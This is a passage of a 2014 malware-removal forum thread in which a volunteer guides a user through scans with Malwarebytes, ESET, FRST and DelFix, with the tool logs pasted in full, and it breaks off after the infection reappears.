Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{7955DE09-3A84-4ACD-B95B-E8BDC6953354}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{79C07A0E-4720-483D-A65C-209EE376F69D}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{7E7490AA-4C91-49FC-834F-AEC8A967B83C}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{83C3ED5C-BC51-49FB-AEE7-B3D05BF08CCB}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{8744B382-6735-4656-8601-D5CCFEAEFE55}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{8A6B9C74-6A39-4FE8-8A3A-8F6B185E3768}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{8B87624F-4827-4ABE-BCA1-14D2839349EB}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{94260274-7766-49A0-BFA1-F4BFD09B3E1D}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{94B5D653-6DD1-4F16-A3F5-637E52F61728}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{97C0F0AE-DDAC-4787-A166-51EEB7456632}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{9DAF574B-F62C-4421-8720-5A2DF9EB103A}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{A03CE0E0-D803-4CD7-896A-1B9EF7CAE5CF}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{A149A6B3-AB36-4DDB-A6C4-268D432FEECB}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{A41F4C3C-D3C5-4FB5-A608-A5EF4D77730D}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{A66D2B5A-576E-4E73-A420-5F955B19EB7E}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{AB81761D-7722-4CDC-9B38-4FDA2651F88E}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{AD057800-B9DD-43F2-8038-F44D8F1620A6}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{B06F65A6-93CC-4F15-AA0D-EA137533EE9F}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{B408126B-3BC0-45A9-9357-D980BE226B90}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{B81447F0-7E1C-4150-BE04-748296005013}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{B9C4CCE4-4926-4864-AFB9-01976BF03ED4}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{BA4A3B95-9C6B-4ABA-8502-846DB2A7C028}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{C1025160-97AC-4825-886D-DD41B19C4A2A}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{C6B83F69-CA19-40EB-B774-18C43669CEAB}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{C85BCAF0-7EA5-4C1C-9969-358398DD3051}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{C8939B13-C83F-437A-B18A-8744C11A611F}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{C97E757D-E486-4EB0-A975-39B9DBACC38C}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{CA115671-3F10-47E1-9BB0-82BF12977268}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{CD6772C3-8542-4EB7-AE1B-6C2AB62F1531}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{CFC6211F-73BF-437F-8C4D-4F089226B16F}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{D3824225-F60C-4EE3-A309-63723500B11E}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{D8B581FC-BD98-46BD-B0E1-6424B1C46D7D}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{DC429E13-5A1B-4B07-8BAE-69DF7173DDE8}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{DD9B655D-F6BA-445C-991E-C9A31102024C}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{E738C508-CA5C-4499-96E2-8528E41BA394}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{E78E85AA-986F-4A8C-B128-325770917D55}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{E800A4BA-4FA5-46B9-97D6-0FE5D8B686D9}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{E96DE630-615B-4BB6-AE18-9C2721A698DA}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{EB89FDA7-2CF2-423C-A79D-AD4F9536B020}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{EBD96251-DD30-416F-9225-C2105EDA9710}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{ECBE5515-125B-4294-9E2E-1F835BA3795D}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{EF3F1F2C-91F8-47E9-8510-FB0D5A7A418A}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{F200F341-52B6-4965-9389-DB4C750F501F}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{F4FE064A-9801-4FAD-BF35-14FE65FEBC6F}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{F5ABEF00-109E-4346-8120-902F9590621B}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{FAE3077C-C2FD-4EBA-AB28-F15132E00DD7}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{FD498B14-D1B3-40A2-A9B1-493D2C3856AE}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{FD9CF471-38D5-418D-B518-836A485FE4E9}
Successfully deleted: [Empty Folder] C:\Users\Ryan\appdata\local\{FEFB282F-D34B-4E49-B893-3A8F04533A16}
~~~ Event Viewer Logs were cleared
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 10/30/2014 at 21:55:17.45
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
What light through yonder window breaks? It is the east, and Juliet is the sun!
LOL
That should had helped the machine?
Download Malwarebytes' Anti-Malware (http://www.malwarebytes.org/mbam-download.php) to your desktop.
Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"
http://i1269.photobucket.com/albums/jj590/OCD-WTT/MBAMDashboard_zpsddef9b5f.gif (http://s1269.photobucket.com/user/OCD-WTT/media/MBAMDashboard_zpsddef9b5f.gif.html)
On the Dashboard click on Update Now
Go to the Setting Tab
Under Setting go to Detection and Protection
Under PUP and PUM make sure both are set to show Treat Dections as Malware
Go to Advanced setting and make sure Automatically Quarantine Detected Items is checked
Then on the Dashboard click on Scan
Make sure to select THREAT SCAN
Then click on Scan
When the scan is finished and the log pops up...select Copy to Clipboard
Please paste the log back into this thread for review
Exit Malwarebytes
ascot1340
2014-10-31, 22:17
Malwarebytes Anti-Malware
www.malwarebytes.org
Scan Date: 10/31/2014
Scan Time: 4:00:11 PM
Logfile:
Administrator: Yes
Version: 2.00.3.1025
Malware Database: v2014.10.31.10
Rootkit Database: v2014.10.22.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Ryan
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 392031
Time Elapsed: 12 min, 51 sec
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
Processes: 0
(No malicious items detected)
Modules: 0
(No malicious items detected)
Registry Keys: 0
(No malicious items detected)
Registry Values: 0
(No malicious items detected)
Registry Data: 0
(No malicious items detected)
Folders: 0
(No malicious items detected)
Files: 0
(No malicious items detected)
Physical Sectors: 0
(No malicious items detected)
(end)
Update me please how the computer is at the moment.
What we can do now is run an online scan with Eset, for the time being it is our most trusted scanner.
Most reliable and thorough.
The settings I suggest will show us items located in quarantine folders so don't be alarmed with this, also, in case of a false positive I ask that you not allow it to delete what it does find.
This scanner can take quite a bit of time to run, depending of course how full your computer is.
Go here (http://www.eset.com/us/online-scanner/) to run an online scannner from ESET. Windows Vista/Windows 7/Windows 8 users will need to right click on their Internet Explorer shortcut, and select Run as Administrator
Note:
For browsers other than Internet Explorer, you will be prompted to download and install esetsmartinstaller_enu.exe. Click on the link and save the file to a convenient location. Double click on it to install and a new window will open. Follow the prompts.
Turn off the real time scanner of any existing antivirus program while performing the online scan. Here's how (http://www.techsupportforum.com/forums/f50/how-to-disable-your-security-applications-490111.html).
Click the blue Run ESET Online Scanner button
Tick the box next to YES, I accept the Terms of Use.
Click Start
When asked, allow the program to install the "OnlineScanner.cab" activex control by clicking the Install button
Once the activex control is installed, on the next screen click on Enable detection of potentially unwanted applications
Click on Advanced Settings
Make sure that the option Remove found threats is unticked.
Ensure these options are ticked
Scan archives
Scan for potentially unsafe applications
Enable Anti-Stealth technology
Click Start
Wait for the scan to finish
When the scan is done, if it shows a screen that says "Threats found!", then click "List of found threats", and then click "Export to text file..."
Save that text file on your desktop. Copy and paste the contents of that log as a reply to this topic.
Close the ESET online scan.
*************************************
ascot1340
2014-11-01, 05:54
The computer seems to be running normally now and there are no longer multiple dllhost.exe *32 processes running in the task manager. I ran the ESET Online scanner and the threat list is posted below:
C:\FRST\Quarantine\C\Users\Ryan\AppData\LocalLow\ynsvabi.dll.xBAD a variant of Win32/Kryptik.COFU trojan
C:\Users\Ryan\AppData\LocalLow\tioxkul.dll a variant of Win32/Kryptik.COYH trojan
The computer seems to be running normally now and there are no longer multiple dllhost.exe *32 processes running in the task manager
Yes!
Open notepad. Please copy the contents of the quote box below. To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open notepad. save it to the Desktop as fixlist.txt
NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.
It needs to be saved Next to the "Farbar Recovery Scan Tool" (If asked to overwrite existing one please allow)
start
CloseProcesses:
C:\Users\Ryan\AppData\LocalLow\tioxkul.dll
End
Open FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
After we run this last script we're ready to remove tools and quarantine folders. Just want to see this fix above before we start.
ascot1340
2014-11-02, 00:07
Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 01-11-2014
Ran by Ryan at 2014-11-01 18:01:58 Run:2
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Boot Mode: Normal
==============================================
Content of fixlist:
*****************
start
CloseProcesses:
C:\Users\Ryan\AppData\LocalLow\tioxkul.dll
End
*****************
Processes closed successfully.
C:\Users\Ryan\AppData\LocalLow\tioxkul.dll => Moved successfully.
The system needed a reboot.
==== End of Fixlog ====
Download Delfix from here (http://general-changelog-team.fr/fr/downloads/finish/20-outils-de-xplode/9-delfix)
Ensure Remove disinfection tools is ticked
Also tick:
Create registry backup
Click Run
Purge system restore
http://www.hdrcgb.org.uk/g2g/delfix.jpg
Any other tools and files found can simply be deleted or uninstall via Add/Remove Programs in the Control Panel etc.
~~~~~~~~~~~~~~~~~~~~~~~
Your good to go, good job!
Please take the time to read over a few of my preventive tips.
Please navigate to Microsoft Windows Updates (http://update.microsoft.com/windowsupdate/v6/default.aspx?ln=en-us) and download all the "Critical Updates" for Windows.
Answers to common security questions - Best Practices (http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/) by quietman7, MVP
How Malware Spreads - How did I get infected? (http://www.bleepingcomputer.com/forums/t/287710/how-malware-spreads-how-did-i-get-infected/) by quietman7, MVP
Simple and easy ways to keep your computer safe and secure on the Internet (http://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/) by Lawrence Abrams, MVP
How to Prevent Malware (http://users.telenet.be/bluepatchy/miekiemoes/prevention.html) by miekiemoes, MVP
How to backup and restore your data using Cobian Backup (http://www.bleepingcomputer.com/tutorials/backup-and-restore-data-with-cobian-backup/) by YourHighness
Slow Computer/browser? It May Not Be Malware (http://www.bleepingcomputer.com/forums/t/87058/slow-computerbrowser-check-here-first;-it-may-not-be-malware/) by quietman7, MVP
The following programmes come highly recommended in the security community.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xKsUqI5A.png.pagespeed.ic.vn1Hlvqi8h.jpgAdBlock (https://adblockplus.org/en/firefox) is a browser add-on that blocks annoying banners, pop-ups and video ads.
http://i.imgur.com/E8I37RF.pngCryptoPrevent (https://www.foolishit.com/) places policy restrictions on loading points for ransomware (eg.CryptoPrevent), preventing your files from being encrypted.
http://i.imgur.com/EG85Vjt.png Malwarebytes Anti-Exploit (https://www.malwarebytes.org/antiexploit/) (MBAE) is designed to prevent zero-day malware from exploiting vulnerable software.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/x6YRrgUC.png.pagespeed.ic.HjgFxjvw2Z.jpgMalwarebytes Anti-Malware Premium (https://www.malwarebytes.org/) (MBAM) works in real-time along side your Anti-Virus to prevent malware execution.
http://1-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xjv4nhMJ.png.pagespeed.ic.A5YbWn1eDO.png NoScript (http://noscript.net/) is a Firefox add-on that blocks the actions of malicious scripts by using whitelisting and other technology.
http://i.imgur.com/3O8r9Uq.png (http://www.sandboxie.com/) Sandboxie (http://www.sandboxie.com/) isolates programmes of your choice, preventing files from being written to your HDD unless approved by you.
http://1-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/DgW1XL2.png.pagespeed.ce.v1OlJl_ZAS.png Secuina PSI (http://secunia.com/vulnerability_scanning/personal/) will scan your computer for vulnerable software that is outdated, and automatically find the latest update for you.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xj1OLIec.png.pagespeed.ic.k6hhwopU0q.jpg SpywareBlaster (https://www.brightfort.com/spywareblaster.html) is a form of passive protection, designed to block the actions of malicious websites and tracking cookies.
http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xJEP5iWI.png.pagespeed.ic.4tmM1lM7DQ.pngWeb of Trust (https://www.mywot.com/) (WOT) is a browser add-on designed to alert you before interacting with a potentially malicious website.
ascot1340
2014-11-02, 05:34
Awesome! The DelFix log is posted below. Thanks so much for all of your help!
# DelFix v10.8 - Logfile created 01/11/2014 at 23:30:35
# Updated 29/07/2014 by Xplode
# Username : Ryan - RYAN-PC
# Operating System : Windows 7 Home Premium Service Pack 1 (64 bits)
~ Removing disinfection tools ...
Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\Ryan\Desktop\FRST-OlderVersion
Deleted : C:\Users\Ryan\Desktop\Addition.txt
Deleted : C:\Users\Ryan\Desktop\AdwCleaner.exe
Deleted : C:\Users\Ryan\Desktop\aswMBR.exe
Deleted : C:\Users\Ryan\Desktop\aswMBR.txt
Deleted : C:\Users\Ryan\Desktop\Fixlog.txt
Deleted : C:\Users\Ryan\Desktop\FRST.txt
Deleted : C:\Users\Ryan\Desktop\FRST64.exe
Deleted : C:\Users\Ryan\Desktop\JRT.exe
Deleted : C:\Users\Ryan\Desktop\JRT.txt
Deleted : C:\Users\Ryan\Desktop\MBR.dat
Deleted : HKLM\SOFTWARE\AdwCleaner
Deleted : HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_ASWMBR
~ Creating registry backup ... OK
~ Cleaning system restore ...
Deleted : RP #471 [Scheduled Checkpoint | 11/01/2014 04:31:23]
New restore point created !
########## - EOF - ##########
Glad we could help. :)http://i204.photobucket.com/albums/bb106/Juliet702/sparkle.gif
ascot1340
2014-11-03, 05:14
Oh no! It's back! Right now, three dllhost.exe *32 processes running in the task manager.
ascot1340
2014-11-03, 05:59
Now 10 dllhost.exe *32 processes running in task manager. I noticed it was back when the little blue spinning circle kept appearing next to the mouse cursor arrow. I ran the FRST and aswMBR tools again and have posted the logs below.
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Ryan (administrator) on RYAN-PC on 02-11-2014 22:23:17
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Sentelic Corporation) C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
() C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
(GARMIN Corp.) C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(VIZIO Computer Inc.) C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
() C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Adobe Systems Incorporated) C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_167_ActiveX.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [FspUip] => C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe [5406104 2012-05-01] (Sentelic Corporation)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170752 2012-05-09] (SRS Labs, Inc.)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [1020064 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [462712 2012-03-09] ()
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-26] (Intel Corporation)
HKLM-x32\...\Run: [OSD Utility] => C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe [7892992 2012-04-27] (VIZIO Computer Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [ANT Agent] => C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe [14731776 2013-02-15] (GARMIN Corp.)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [Google Update] => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-10-27] (Google Inc.)
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [260928 2012-03-14] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [215360 2012-03-14] (NVIDIA Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.bing.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x76D36B0F2FC9CC01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.200.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
Chrome:
=======
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [106144 2012-02-13] (Atheros Commnucations) [File not signed]
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1337752 2013-09-12] (ESET)
